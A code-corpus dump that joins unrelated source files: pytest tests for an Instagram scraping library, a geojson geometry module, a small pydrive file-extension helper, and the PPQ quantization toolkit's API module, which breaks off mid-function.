@pytest.mark.parametrize("shortcode", [choice(photos), choice(photo_sets), choice(videos)])
def test_get_likes(shortcode):
anon = Agent()
media = Media(shortcode)
data, pointer = anon.get_likes(media)
assert(media.likes_count >= len(data))
Media.clear_cache()
@pytest.mark.parametrize("count,shortcode",
[(randint(100, 500), shortcode) \
for shortcode in [choice(photos), choice(photo_sets), choice(videos)]])
def test_get_comments(count, shortcode):
anon = Agent()
media = Media(shortcode)
data, pointer = anon.get_comments(media, count=count)
assert(min(media.comments_count, count) == len(data))
assert((pointer is None) == (media.likes_count <= count))
Media.clear_cache()
@pytest.mark.parametrize("count,username", [(randint(1, 10), choice(accounts))])
def test_get_media_account_pointer(count, username):
anon = Agent()
account = Account(username)
pointer = None
data = []
for i in range(count):
tmp, pointer = anon.get_media(account, pointer=pointer)
data.extend(tmp)
assert((pointer is None) == (account.media_count <= count))
Account.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("count,id", [(randint(1, 10), choice(locations))])
def test_get_media_location_pointer(count, id):
anon = Agent()
location = Location(id)
pointer = None
data = []
for i in range(count):
tmp, pointer = anon.get_media(location, pointer=pointer)
data.extend(tmp)
assert((pointer is None) == (location.media_count <= count))
Location.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("count,name", [(randint(1, 10), choice(tags))])
def test_get_media_tag_pointer(count,name):
anon = Agent()
tag = Tag(name)
pointer = None
data = []
for i in range(count):
tmp, pointer = anon.get_media(tag, pointer=pointer)
data.extend(tmp)
assert((pointer is None) == (tag.media_count <= count))
Tag.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("count,shortcode", [(randint(1, 10), shortcode) for shortcode in [choice(photos), choice(photo_sets), choice(videos)]])
def test_get_comments_pointer(count, shortcode):
anon = Agent()
media = Media(shortcode)
pointer = None
data = []
for i in range(count):
tmp, pointer = anon.get_comments(media, pointer=pointer)
data.extend(tmp)
assert((pointer is None) == (media.likes_count <= count))
Media.clear_cache()
```
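The pointer-based tests above all follow the same pagination idiom; a condensed sketch (the username is a placeholder, and only calls already used in the tests appear) looks like this:

```python
# Pagination idiom exercised by the tests above: keep feeding the returned
# pointer back into get_media until it comes back as None.
from instaparser.agents import Agent
from instaparser.entities import Account

anon = Agent()
account = Account("instagram")   # placeholder username

media, pointer = [], None
while True:
    batch, pointer = anon.get_media(account, pointer=pointer)
    media.extend(batch)
    if pointer is None:
        break
print(len(media))
```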
#### File: InstaParser/tests/auth.py
```python
import pytest
from random import randint, choice
from instaparser.agents import AgentAccount
from instaparser.entities import Account, Media, Location, Tag, Comment
from tests.settings import accounts, creds, locations, photos, photo_sets, tags, videos
def parametrize(*args):
result = []
for variable in zip(*args):
result.append((creds["login"], creds["password"], *variable))
return result
@pytest.mark.parametrize("login,password", [(creds["login"], creds["password"])])
def test_auth(login, password):
agent = AgentAccount(login, password)
Account.clear_cache()
@pytest.mark.parametrize("login,password", [(creds["login"], creds["password"])])
def test_update(login, password):
agent = AgentAccount(login, password)
agent.update()
assert(not getattr(agent, "id") is None)
Account.clear_cache()
@pytest.mark.parametrize("login,password,username", parametrize(accounts))
def test_update_account(login, password, username):
agent = AgentAccount(login, password)
account = Account(username)
data = agent.update(account)
assert(not data is None)
Account.clear_cache()
@pytest.mark.parametrize("login,password,shortcode", parametrize(photos))
def test_update_photo(login, password, shortcode):
agent = AgentAccount(login, password)
photo = Media(shortcode)
data = agent.update(photo)
assert(not photo.is_video)
Media.clear_cache()
@pytest.mark.parametrize("login,password,shortcode", parametrize(photo_sets))
def test_update_photo_set(login, password, shortcode):
agent = AgentAccount(login, password)
photo_set = Media(shortcode)
data = agent.update(photo_set)
assert(not photo_set.is_video)
Media.clear_cache()
@pytest.mark.parametrize("login,password,shortcode", parametrize(videos))
def test_update_video(login, password, shortcode):
agent = AgentAccount(login, password)
video = Media(shortcode)
data = agent.update(video)
assert(video.is_video)
Media.clear_cache()
@pytest.mark.parametrize("login,password,id", parametrize(locations))
def test_update_location(login, password, id):
agent = AgentAccount(login, password)
location = Location(id)
data = agent.update(location)
Location.clear_cache()
@pytest.mark.parametrize("login,password,name", parametrize(tags))
def test_update_tag(login, password, name):
agent = AgentAccount(login, password)
tag = Tag(name)
data = agent.update(tag)
Tag.clear_cache()
@pytest.mark.parametrize("login,password,count,username",
parametrize([randint(100, 500) for i in range(3)],
[choice(accounts) for i in range(3)]))
def test_get_media_account(login, password, count, username):
agent = AgentAccount(login, password)
account = Account(username)
data, pointer = agent.get_media(account, count=count)
assert(min(account.media_count, count) == len(data))
assert((pointer is None) == (account.media_count <= count))
Account.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("login,password,count,id",
parametrize([randint(100, 500) for i in range(3)],
[choice(locations) for i in range(3)]))
def test_get_media_location(login, password, count, id):
agent = AgentAccount(login, password)
location = Location(id)
data, pointer = agent.get_media(location, count=count)
assert(min(location.media_count, count) == len(data))
assert((pointer is None) == (location.media_count <= count))
Location.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("login,password,count,name",
parametrize([randint(100, 500) for i in range(3)],
[choice(tags) for i in range(3)]))
def test_get_media_tag(login, password, count, name):
agent = AgentAccount(login, password)
tag = Tag(name)
data, pointer = agent.get_media(tag, count=count)
assert(min(tag.media_count, count) == len(data))
assert((pointer is None) == (tag.media_count <= count))
Tag.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("login,password,count,shortcode",
parametrize([randint(100, 500) for i in range(3)],
[choice(photos+photo_sets+videos)]))
def test_get_likes(login, password, count, shortcode):
agent = AgentAccount(login, password)
media = Media(shortcode)
data, pointer = agent.get_likes(media, count=count)
assert(min(media.likes_count, count) == len(data))
assert((pointer is None) == (media.likes_count <= count))
Media.clear_cache()
@pytest.mark.parametrize("login,password,count,username",
parametrize([randint(100, 500) for i in range(3)],
[choice(accounts) for i in range(3)]))
def test_get_follows(login, password, count, username):
agent = AgentAccount(login, password)
account = Account(username)
data, pointer = agent.get_follows(account, count=count)
assert(min(account.follows_count, count) == len(data))
assert((pointer is None) == (account.follows_count <= count))
Account.clear_cache()
@pytest.mark.parametrize("login,password,count,username",
parametrize([randint(100, 500) for i in range(3)],
[choice(accounts) for i in range(3)]))
def test_get_followers(login, password, count, username):
agent = AgentAccount(login, password)
account = Account(username)
data, pointer = agent.get_followers(account, count=count)
assert(min(account.followers_count, count) == len(data))
assert((pointer is None) == (account.followers_count <= count))
Account.clear_cache()
@pytest.mark.parametrize("login,password,count", parametrize([randint(100, 500) for i in range(3)]))
def test_get_feed(login, password, count):
agent = AgentAccount(login, password)
data, pointer = agent.feed(count=count)
assert(count >= len(data))
Account.clear_cache()
@pytest.mark.parametrize("login,password,count,username",
parametrize([randint(1, 10)], [choice(accounts)]))
def test_get_media_account_pointer(login, password, count, username):
agent = AgentAccount(login, password)
account = Account(username)
pointer = None
data = []
for i in range(count):
tmp, pointer = agent.get_media(account, pointer=pointer)
data.extend(tmp)
assert((pointer is None) == (account.media_count <= count))
Account.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("login,password,count,id",
parametrize([randint(1, 10)], [choice(locations)]))
def test_get_media_location_pointer(login, password, count, id):
agent = AgentAccount(login, password)
location = Location(id)
pointer = None
data = []
for i in range(count):
tmp, pointer = agent.get_media(location, pointer=pointer)
data.extend(tmp)
assert((pointer is None) == (location.media_count <= count))
Account.clear_cache()
Media.clear_cache()
Location.clear_cache()
@pytest.mark.parametrize("login,password,count,name",
parametrize([randint(1, 10)], [choice(tags)]))
def test_get_media_tag_pointer(login, password, count, name):
agent = AgentAccount(login, password)
tag = Tag(name)
pointer = None
data = []
for i in range(count):
tmp, pointer = agent.get_media(tag, pointer=pointer)
data.extend(tmp)
assert((pointer is None) == (tag.media_count <= count))
Account.clear_cache()
Media.clear_cache()
Tag.clear_cache()
@pytest.mark.parametrize("login,password,count,shortcode",
parametrize([randint(1, 10)], [choice(photos+photo_sets+videos)]))
def test_get_likes_pointer(login, password, count, shortcode):
agent = AgentAccount(login, password)
media = Media(shortcode)
pointer = None
data = []
for i in range(count):
tmp, pointer = agent.get_likes(media, pointer=pointer)
data.extend(tmp)
assert((pointer is None) == (media.likes_count <= count))
Account.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("login,password,count,username",
parametrize([randint(1, 10)], [choice(accounts)]))
def test_get_follows_pointer(login, password, count, username):
agent = AgentAccount(login, password)
account = Account(username)
pointer = None
data = []
for i in range(count):
tmp, pointer = agent.get_follows(account, pointer=pointer)
data.extend(tmp)
assert((pointer is None) == (account.follows_count <= count))
Account.clear_cache()
@pytest.mark.parametrize("login,password,count,username",
parametrize([randint(1, 10)], [choice(accounts)]))
def test_get_followers_pointer(login, password, count, username):
agent = AgentAccount(login, password)
account = Account(username)
pointer = None
data = []
for i in range(count):
tmp, pointer = agent.get_followers(account, pointer=pointer)
data.extend(tmp)
assert((pointer is None) == (account.followers_count <= count))
Account.clear_cache()
@pytest.mark.parametrize("login,password,count", parametrize([randint(1, 10)]))
def test_get_feed_pointer(login, password, count):
agent = AgentAccount(login, password)
pointer = None
data = []
for i in range(count):
tmp, pointer = agent.feed(pointer=pointer)
data.extend(tmp)
Account.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("login,password,shortcode", parametrize(photos))
def test_like_unlike_photo(login, password, shortcode):
agent = AgentAccount(login, password)
photo = Media(shortcode)
assert(agent.like(photo))
assert(agent.unlike(photo))
Account.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("login,password,shortcode", parametrize(photo_sets))
def test_like_unlike_photo_set(login, password, shortcode):
agent = AgentAccount(login, password)
photo_set = Media(shortcode)
assert(agent.like(photo_set))
assert(agent.unlike(photo_set))
Account.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("login,password,shortcode", parametrize(videos))
def test_like_unlike_video(login, password, shortcode):
agent = AgentAccount(login, password)
video = Media(shortcode)
assert(agent.like(video))
assert(agent.unlike(video))
Account.clear_cache()
Media.clear_cache()
@pytest.mark.parametrize("login,password,username", parametrize(accounts))
def test_follow_unfollow(login, password, username):
agent = AgentAccount(login, password)
account = Account(username)
assert(agent.follow(account))
assert(agent.unfollow(account))
Account.clear_cache()
@pytest.mark.parametrize("login,password,shortcode",
parametrize([choice(photos), choice(photo_sets), choice(videos)]))
def test_comment(login, password, shortcode):
agent = AgentAccount(login, password)
media = Media(shortcode)
comment = agent.add_comment(media, "test")
agent.delete_comment(comment)
Account.clear_cache()
Media.clear_cache()
Comment.clear_cache()
``` |
{
"source": "joker234/geojson",
"score": 3
} |
#### File: geojson/geojson/geometry.py
```python
import sys
from decimal import Decimal
from numbers import Number
from geojson.base import GeoJSON
if sys.version_info[0] == 3:
# Python 3.x has no long type
_JSON_compliant_types = (float, int, Decimal)
else:
_JSON_compliant_types = (float, int, Decimal, long) # noqa
class Geometry(GeoJSON):
"""
Represents an abstract base class for a WGS84 geometry.
"""
def __init__(self, coordinates=None, validate=False, precision=6, **extra):
"""
Initialises a Geometry object.
:param coordinates: Coordinates of the Geometry object.
:type coordinates: tuple or list of tuple
:param validate: Raise exception if validation errors are present?
:type validate: boolean
:param precision: Number of decimal places for lat/lon coords.
:type precision: integer
"""
super(Geometry, self).__init__(**extra)
self["coordinates"] = self.clean_coordinates(
coordinates or [], precision)
if validate:
errors = self.errors()
if errors:
raise ValueError('{}: {}'.format(errors, coordinates))
@classmethod
def clean_coordinates(cls, coords, precision):
if isinstance(coords, cls):
return coords['coordinates']
new_coords = []
if isinstance(coords, Geometry):
coords = [coords]
for coord in coords:
if isinstance(coord, (list, tuple)):
new_coords.append(cls.clean_coordinates(coord, precision))
elif isinstance(coord, Geometry):
new_coords.append(coord['coordinates'])
elif isinstance(coord, _JSON_compliant_types):
new_coords.append(round(coord, precision))
else:
raise ValueError("%r is not a JSON compliant number" % coord)
return new_coords
class GeometryCollection(GeoJSON):
"""
Represents an abstract base class for collections of WGS84 geometries.
"""
def __init__(self, geometries=None, **extra):
super(GeometryCollection, self).__init__(**extra)
self["geometries"] = geometries or []
def errors(self):
errors = [geom.errors() for geom in self['geometries']]
return [err for err in errors if err]
def __getitem__(self, key):
try:
return self.get("geometries", ())[key]
except (KeyError, TypeError, IndexError):
return super(GeoJSON, self).__getitem__(key)
# Marker classes.
def check_point(coord):
if not isinstance(coord, list):
return 'each position must be a list'
if len(coord) not in (2, 3):
return 'a position must have exactly 2 or 3 values'
for number in coord:
if not isinstance(number, Number):
return 'a position cannot have inner positions'
class Point(Geometry):
def errors(self):
return check_point(self['coordinates'])
class MultiPoint(Geometry):
def errors(self):
return self.check_list_errors(check_point, self['coordinates'])
def check_line_string(coord):
if not isinstance(coord, list):
return 'each line must be a list of positions'
if len(coord) < 2:
return ('the "coordinates" member must be an array of '
'two or more positions')
for pos in coord:
error = check_point(pos)
if error:
return error
class LineString(MultiPoint):
def errors(self):
return check_line_string(self['coordinates'])
class MultiLineString(Geometry):
def errors(self):
return self.check_list_errors(check_line_string, self['coordinates'])
def check_polygon(coord):
if not isinstance(coord, list):
return 'Each polygon must be a list of linear rings'
if not all(isinstance(elem, list) for elem in coord):
return "Each element of a polygon's coordinates must be a list"
lengths = all(len(elem) >= 4 for elem in coord)
if lengths is False:
return 'Each linear ring must contain at least 4 positions'
isring = all(elem[0] == elem[-1] for elem in coord)
if isring is False:
return 'Each linear ring must end where it started'
class Polygon(Geometry):
def errors(self):
return check_polygon(self['coordinates'])
class MultiPolygon(Geometry):
def errors(self):
return self.check_list_errors(check_polygon, self['coordinates'])
class Default(object):
"""
GeoJSON default object.
"""
``` |
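A short usage sketch for the validation helpers above (the import path follows the module shown; coordinates are arbitrary):

```python
# Construct a valid Point and inspect errors on a malformed LineString.
from geojson.geometry import LineString, Point

pt = Point((-115.81, 37.24), validate=True)   # no exception: exactly 2 numeric values
line = LineString([(8.919, 44.4074)])         # only one position
print(pt['coordinates'])                      # [-115.81, 37.24]
print(line.errors())                          # message about needing two or more positions
```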
{
"source": "joker23/pydrive",
"score": 3
} |
#### File: pydrive/google/drive_util.py
```python
import os
### drive_util
### has_mimetype
# Determines whether drive supports this mimetype upload
def has_mimetype(path):
# list of not supported types
    not_supported = ['md']
    ext = path.split("/")[-1]
    if ext[0] == '.' or '.' not in ext:
return 0
elif (ext.split('.')[-1] in not_supported):
return 0
else:
return 1
``` |
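Quick sanity checks for `has_mimetype` above (the import path is an assumption based on the file location):

```python
# Expected results given the blocklist above.
from google.drive_util import has_mimetype  # assumed import path

print(has_mimetype("notes/report.pdf"))  # 1 - extension not in the blocklist
print(has_mimetype("notes/README.md"))   # 0 - markdown is listed as unsupported
print(has_mimetype("notes/.bashrc"))     # 0 - hidden file / no usable extension
```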
{
"source": "joker255x/ppq",
"score": 2
} |
#### File: ppq/api/__init__.py
```python
import os
from typing import Any, Callable, List
import torch
from ppq.core import (NetworkFramework, TargetPlatform, empty_ppq_cache,
ppq_warning)
from ppq.executor import TorchExecutor
from ppq.IR import (BaseGraph, GraphCommand, GraphCommandType, GraphFormatter,
GraphMerger)
from ppq.IR.morph import GraphDeviceSwitcher
from ppq.parser import dump_graph_to_file, load_graph
from ppq.quantization.quantizer import (BaseQuantizer, ExtQuantizer,
NXP_Quantizer, PPL_DSP_Quantizer,
PPLCUDAQuantizer, TensorRTQuantizer)
from ppq.scheduler import DISPATCHER_TABLE
from torch.utils.data import DataLoader
from .setting import *
QUANTIZER_COLLECTION = {
TargetPlatform.DSP_INT8: PPL_DSP_Quantizer,
TargetPlatform.TRT_INT8: TensorRTQuantizer,
TargetPlatform.NXP_INT8: NXP_Quantizer,
TargetPlatform.PPL_CUDA_INT8: PPLCUDAQuantizer,
TargetPlatform.EXTENSION: ExtQuantizer
}
def load_onnx_graph(onnx_import_file: str, setting: QuantizationSetting) -> BaseGraph:
"""
从一个指定位置加载 onnx 计算图
load onnx graph from the specified location
Args:
onnx_import_file (str): onnx 计算图的保存位置 the specified location
Returns:
BaseGraph: 解析 onnx 获得的 ppq 计算图对象 the parsed ppq IR graph
"""
ppq_ir = load_graph(onnx_import_file, from_framework=NetworkFramework.ONNX)
return format_graph(graph=ppq_ir, setting=setting)
def load_caffe_graph(prototxt_path: str, caffemodel_path: str,
setting: QuantizationSetting) -> BaseGraph:
"""
从一个指定位置加载 caffe 计算图
load caffe graph from the specified location
Args:
prototxt_path (str): caffe prototxt的保存位置 the specified location of caffe prototxt
        caffemodel_path (str): caffe weight的保存位置 the specified location of caffe weight
Returns:
BaseGraph: 解析 caffe 获得的 ppq 计算图对象 the parsed ppq IR graph
"""
ppq_ir = load_graph(file_path=prototxt_path, caffemodel_path=caffemodel_path, from_framework=NetworkFramework.CAFFE)
return format_graph(graph=ppq_ir, setting=setting)
def dump_torch_to_onnx(
model: torch.nn.Module,
onnx_export_file: str,
input_shape: List[int],
input_dtype: torch.dtype,
inputs: List[Any] = None,
device: str = 'cuda'):
"""
转换一个 torch 模型到 onnx,并保存到指定位置
convert a torch model to onnx and save to the specified location
Args:
model (torch.nn.Module): 被转换的 torch 模型 torch model used for conversion
onnx_export_file (str): 保存文件的路径 the path to save onnx model
input_shape (List[int]): 模型输入尺寸,用于执行 jit.trace,对于动态尺寸的模型,输入一个模型可接受的尺寸即可。
如果模型存在多个输入,则需要使用 inputs 变量进行传参,此项设置为 None
a list of ints indicating size of input, for multiple inputs, please use keyword arg inputs for
direct parameter passing and this should be set to None
input_dtype (torch.dtype): 模型输入数据类型,如果模型存在多个输入,则需要使用 inputs 变量进行传参,此项设置为 None
the torch datatype of input, for multiple inputs, please use keyword arg inputs
for direct parameter passing and this should be set to None
inputs (List[Any], optional): 对于存在多个输入的模型,在Inputs中直接指定一个输入List,从而完成模型的tracing。
for multiple inputs, please give the specified inputs directly in the form of
a list of arrays
device (str, optional): 转换过程的执行设备 the execution device, defaults to 'cuda'.
"""
# set model to eval mode, stablize normalization weights.
model.eval()
if inputs is None:
dummy_input = torch.zeros(size=input_shape, device=device, dtype=input_dtype)
else: dummy_input = inputs
torch.onnx.export(
model=model, args=dummy_input,
verbose=False, f=onnx_export_file, opset_version=11,
)
@ empty_ppq_cache
def quantize_onnx_model(
onnx_import_file: str,
calib_dataloader: DataLoader,
calib_steps: int,
input_shape: List[int],
input_dtype: torch.dtype = torch.float,
inputs: List[Any] = None,
setting: QuantizationSetting = None,
collate_fn: Callable = None,
platform: TargetPlatform = TargetPlatform.DSP_INT8,
device: str = 'cuda',
verbose: int = 0,
do_quantize: bool = True,
) -> BaseGraph:
"""
量化一个 onnx 原生的模型
输入一个 onnx 模型的文件路径
返回一个量化后的 PPQ.IR.BaseGraph
quantize onnx model, input onnx model and return quantized ppq IR graph
Args:
onnx_import_file (str): 被量化的 onnx 模型文件路径 onnx model location
calib_dataloader (DataLoader): 校准数据集 calibration data loader
calib_steps (int): 校准步数 calibration steps
collate_fn (Callable): 校准数据的预处理函数 batch collate func for preprocessing
input_shape (List[int]): 模型输入尺寸,用于执行 jit.trace,对于动态尺寸的模型,输入一个模型可接受的尺寸即可。
如果模型存在多个输入,则需要使用 inputs 变量进行传参,此项设置为 None
a list of ints indicating size of input, for multiple inputs, please use
keyword arg inputs for direct parameter passing and this should be set to None
input_dtype (torch.dtype): 模型输入数据类型,如果模型存在多个输入,则需要使用 inputs 变量进行传参,此项设置为 None
the torch datatype of input, for multiple inputs, please use keyword arg inputs
for direct parameter passing and this should be set to None
inputs (List[Any], optional): 对于存在多个输入的模型,在Inputs中直接指定一个输入List,从而完成模型的tracing。
for multiple inputs, please give the specified inputs directly in the form of
a list of arrays
setting (OptimSetting): 量化配置信息,用于配置量化的各项参数,设置为 None 时加载默认参数。
Quantization setting, default setting will be used when set None
do_quantize (Bool, optional): 是否执行量化 whether to quantize the model, defaults to True.
platform (TargetPlatform, optional): 量化的目标平台 target backend platform, defaults to TargetPlatform.DSP_INT8.
device (str, optional): 量化过程的执行设备 execution device, defaults to 'cuda'.
verbose (int, optional): 是否打印详细信息 whether to print details, defaults to 0.
Raises:
ValueError: 给定平台不可量化 the given platform doesn't support quantization
KeyError: 给定平台不被支持 the given platform is not supported yet
Returns:
BaseGraph: 量化后的IR,包含了后端量化所需的全部信息
The quantized IR, containing all information needed for backend execution
"""
if not TargetPlatform.is_quantized_platform(platform=platform):
        raise ValueError(f'Target Platform {platform} is a non-quantizable platform.')
if platform not in QUANTIZER_COLLECTION:
raise KeyError(f'Target Platform {platform} is not supported by ppq right now.')
if do_quantize:
if calib_dataloader is None or calib_steps is None:
raise TypeError('Quantization needs a valid calib_dataloader and calib_steps setting.')
if setting is None:
setting = QuantizationSettingFactory.default_setting()
ppq_ir = load_onnx_graph(onnx_import_file=onnx_import_file, setting=setting)
if inputs is None:
dummy_input = torch.zeros(size=input_shape, device=device, dtype=input_dtype)
else: dummy_input = inputs
quantizer = QUANTIZER_COLLECTION[platform](graph=ppq_ir)
assert isinstance(quantizer, BaseQuantizer)
executor = TorchExecutor(graph=quantizer._graph, device=device)
if do_quantize:
quantizer.quantize(
inputs=dummy_input,
calib_dataloader=calib_dataloader,
executor=executor,
setting=setting,
calib_steps=calib_steps,
collate_fn=collate_fn
)
if verbose: quantizer.report()
return quantizer._graph
else:
return quantizer._graph
@ empty_ppq_cache
def quantize_torch_model(
model: torch.nn.Module,
calib_dataloader: DataLoader,
calib_steps: int,
input_shape: List[int],
input_dtype: torch.dtype = torch.float,
setting: QuantizationSetting = None,
collate_fn: Callable = None,
inputs: List[Any] = None,
do_quantize: bool = True,
platform: TargetPlatform = TargetPlatform.DSP_INT8,
onnx_export_file: str = 'onnx.model',
device: str = 'cuda',
verbose: int = 0,
) -> BaseGraph:
"""
量化一个 Pytorch 原生的模型
输入一个 torch.nn.Module
返回一个量化后的 PPQ.IR.BaseGraph
quantize a pytorch model, input pytorch model and return quantized ppq IR graph
Args:
model (torch.nn.Module): 被量化的 torch 模型(torch.nn.Module) the pytorch model
calib_dataloader (DataLoader): 校准数据集 calibration dataloader
calib_steps (int): 校准步数 calibration steps
collate_fn (Callable): 校准数据的预处理函数 batch collate func for preprocessing
input_shape (List[int]): 模型输入尺寸,用于执行 jit.trace,对于动态尺寸的模型,输入一个模型可接受的尺寸即可。
如果模型存在多个输入,则需要使用 inputs 变量进行传参,此项设置为 None
a list of ints indicating size of input, for multiple inputs, please use
keyword arg inputs for direct parameter passing and this should be set to None
input_dtype (torch.dtype): 模型输入数据类型,如果模型存在多个输入,则需要使用 inputs 变量进行传参,此项设置为 None
the torch datatype of input, for multiple inputs, please use keyword arg inputs
for direct parameter passing and this should be set to None
setting (OptimSetting): 量化配置信息,用于配置量化的各项参数,设置为 None 时加载默认参数。
Quantization setting, default setting will be used when set None
inputs (List[Any], optional): 对于存在多个输入的模型,在Inputs中直接指定一个输入List,从而完成模型的tracing。
for multiple inputs, please give the specified inputs directly in the form of
a list of arrays
        do_quantize (Bool, optional): 是否执行量化 whether to quantize the model, defaults to True.
platform (TargetPlatform, optional): 量化的目标平台 target backend platform, defaults to TargetPlatform.DSP_INT8.
device (str, optional): 量化过程的执行设备 execution device, defaults to 'cuda'.
verbose (int, optional): 是否打印详细信息 whether to print details, defaults to 0.
Raises:
ValueError: 给定平台不可量化 the given platform doesn't support quantization
KeyError: 给定平台不被支持 the given platform is not supported yet
Returns:
BaseGraph: 量化后的IR,包含了后端量化所需的全部信息
The quantized IR, containing all information needed for backend execution
"""
# dump pytorch model to onnx
dump_torch_to_onnx(model=model, onnx_export_file=onnx_export_file,
input_shape=input_shape, input_dtype=input_dtype,
inputs=inputs, device=device)
return quantize_onnx_model(onnx_import_file=onnx_export_file,
calib_dataloader=calib_dataloader, calib_steps=calib_steps, collate_fn=collate_fn,
input_shape=input_shape, input_dtype=input_dtype, inputs=inputs, setting=setting,
platform=platform, device=device, verbose=verbose, do_quantize=do_quantize)
@ empty_ppq_cache
def quantize_caffe_model(
caffe_proto_file: str,
caffe_model_file: str,
calib_dataloader: DataLoader,
calib_steps: int,
input_shape: List[int],
input_dtype: torch.dtype = torch.float,
setting: QuantizationSetting = None,
collate_fn: Callable = None,
inputs: List[Any] = None,
do_quantize: bool = True,
platform: TargetPlatform = TargetPlatform.DSP_INT8,
device: str = 'cuda',
verbose: int = 0,
) -> BaseGraph:
"""
量化一个 caffe 原生的模型
输入一个 caffe 模型的文件路径和权重路径
返回一个量化后的 PPQ.IR.BaseGraph
quantize caffe model, input caffe prototxt and weight path, return a quantized ppq graph
Args:
caffe_proto_file (str): 被量化的 caffe 模型文件 .prototxt 路径
caffe prototxt location
caffe_model_file (str): 被量化的 caffe 模型文件 .caffemodel 路径
caffe weight location
calib_dataloader (DataLoader): 校准数据集 calibration data loader
calib_steps (int): 校准步数 calibration steps
collate_fn (Callable): 校准数据的预处理函数 batch collate func for preprocessing
input_shape (List[int]): 模型输入尺寸,用于执行 jit.trace,对于动态尺寸的模型,输入一个模型可接受的尺寸即可。
如果模型存在多个输入,则需要使用 inputs 变量进行传参,此项设置为 None
a list of ints indicating size of input, for multiple inputs, please use
keyword arg inputs for direct parameter passing and this should be set to None
input_dtype (torch.dtype): 模型输入数据类型,如果模型存在多个输入,则需要使用 inputs 变量进行传参,此项设置为 None
the torch datatype of input, for multiple inputs, please use keyword arg inputs
for direct parameter passing and this should be set to None
setting (OptimSetting): 量化配置信息,用于配置量化的各项参数,设置为 None 时加载默认参数。
Quantization setting, default setting will be used when set None
inputs (List[Any], optional): 对于存在多个输入的模型,在Inputs中直接指定一个输入List,从而完成模型的tracing。
for multiple inputs, please give the specified inputs directly in the form of
a list of arrays
        do_quantize (Bool, optional): 是否执行量化 whether to quantize the model, defaults to True.
platform (TargetPlatform, optional): 量化的目标平台 target backend platform, defaults to TargetPlatform.DSP_INT8.
device (str, optional): 量化过程的执行设备 execution device, defaults to 'cuda'.
verbose (int, optional): 是否打印详细信息 whether to print details, defaults to 0.
Raises:
ValueError: 给定平台不可量化 the given platform doesn't support quantization
KeyError: 给定平台不被支持 the given platform is not supported yet
Returns:
BaseGraph: 量化后的IR,包含了后端量化所需的全部信息
The quantized IR, containing all information needed for backend execution
"""
if not TargetPlatform.is_quantized_platform(platform=platform):
        raise ValueError(f'Target Platform {platform} is a non-quantizable platform.')
if platform not in QUANTIZER_COLLECTION:
raise KeyError(f'Target Platform {platform} is not supported by ppq right now.')
if do_quantize:
if calib_dataloader is None or calib_steps is None:
raise TypeError('Quantization needs a valid calib_dataloader and calib_steps setting.')
if setting is None:
setting = QuantizationSettingFactory.default_setting()
ppq_ir = load_graph(file_path=caffe_proto_file,
caffemodel_path=caffe_model_file,
from_framework=NetworkFramework.CAFFE)
ppq_ir = format_graph(ppq_ir, setting=setting)
if inputs is None:
dummy_input = torch.zeros(size=input_shape, device=device, dtype=input_dtype)
else: dummy_input = inputs
quantizer = QUANTIZER_COLLECTION[platform](graph=ppq_ir)
assert isinstance(quantizer, BaseQuantizer)
executor = TorchExecutor(graph=quantizer._graph, device=device)
if do_quantize:
quantizer.quantize(
inputs=dummy_input,
calib_dataloader=calib_dataloader,
executor=executor,
setting=setting,
calib_steps=calib_steps,
collate_fn=collate_fn
)
if verbose: quantizer.report()
return quantizer._graph
else:
return quantizer._graph
def export_ppq_graph(
graph: BaseGraph, platform: TargetPlatform,
graph_save_to: str, config_save_to: str = None, **kwargs) -> None:
"""
使用这个函数将 PPQ ir 保存到文件,同时导出 PPQ 的量化配置信息。
该函数可以将 PPQ ir 保存为不同格式的模型文件。
this func dumps ppq IR to file, and exports quantization setting information simultaneously
    详细的支持情况请参考:ppq.parser.__init__.py
    for details please refer to ppq.parser.__init__.py
Args:
graph (BaseGraph): 被保存的 ir
the ppq IR graph
platform (TargetPlatform): 期望部署的目标平台
target backend platform
graph_save_to (str): 模型保存文件名
filename to save
config_save_to (str): 量化配置信息保存文件名。
注意部分平台导出时会将量化配置信息直接写入模型,在这种情况下设置此参数无效
note that some of platforms requires to write quantization setting
directly into the model file, this parameter won't have effect at
this situation
"""
for save_path in [graph_save_to, config_save_to]:
if save_path is None: continue
if os.path.exists(save_path):
if os.path.isfile(save_path):
ppq_warning(f'File {save_path} has already exist, ppq exporter will overwrite it.')
if os.path.isdir(save_path):
raise FileExistsError(f'File {save_path} has already exist, and it is a directory, '
'ppq exporter can not create file here.')
dump_graph_to_file(file_path=graph_save_to, config_path=config_save_to,
target_platform=platform, graph=graph)
def format_graph(graph: BaseGraph, setting: QuantizationSetting) -> BaseGraph:
"""
这个函数将对读入的计算图进行预处理 this func will preprocess the loaded computational graph
所有的算子将被规范化,将符合 PPQ 的定义标准 all operators will be regularized
计算图将被切分并调度到不同设备 operators will be dispatched to different devices
"""
# do graph level optimization
formatter = GraphDeviceSwitcher(GraphFormatter(GraphMerger(graph)))
if str(setting.dispatcher).lower() not in DISPATCHER_TABLE:
raise ValueError(f'Can not found dispatcher type "{setting.dispatcher}", check your input again.')
dispatcher = DISPATCHER_TABLE[str(setting.dispatcher).lower()]
formatter(GraphCommand(GraphCommandType.FORMAT_CONSTANT_INPUT))
formatter(GraphCommand(GraphCommandType.FUSE_CONV_BN))
formatter(GraphCommand(GraphCommandType.FORMAT_PARAMETERS))
formatter(GraphCommand(GraphCommandType.FORMAT_CAST))
formatter(GraphCommand(GraphCommandType.DELETE_ISOLATED))
# dispatching.
dispatching_table = dispatcher.dispatch(
graph, quant_platform=TargetPlatform.UNSPECIFIED,
fp32_platform=TargetPlatform.FP32,
SOI_platform=TargetPlatform.SHAPE_OR_INDEX)
# override dispatching result with setting
dispatching_override = setting.dispatching_table
for dispatching in dispatching_override.dispatchings:
if dispatching.operation not in graph.operations: continue
assert isinstance(dispatching.platform, int), (
            f'Your dispatching table contains an invalid setting for operation {dispatching.operation}, '
            'all platform settings given in the dispatching table are expected to be int, '
            f'however {type(dispatching.platform)} was given.')
